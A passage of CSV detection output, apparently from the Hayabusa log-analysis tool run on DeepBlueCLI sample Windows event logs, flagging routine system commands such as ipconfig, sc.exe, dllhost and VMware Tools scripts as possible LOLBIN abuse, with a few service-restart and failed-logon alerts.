C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware 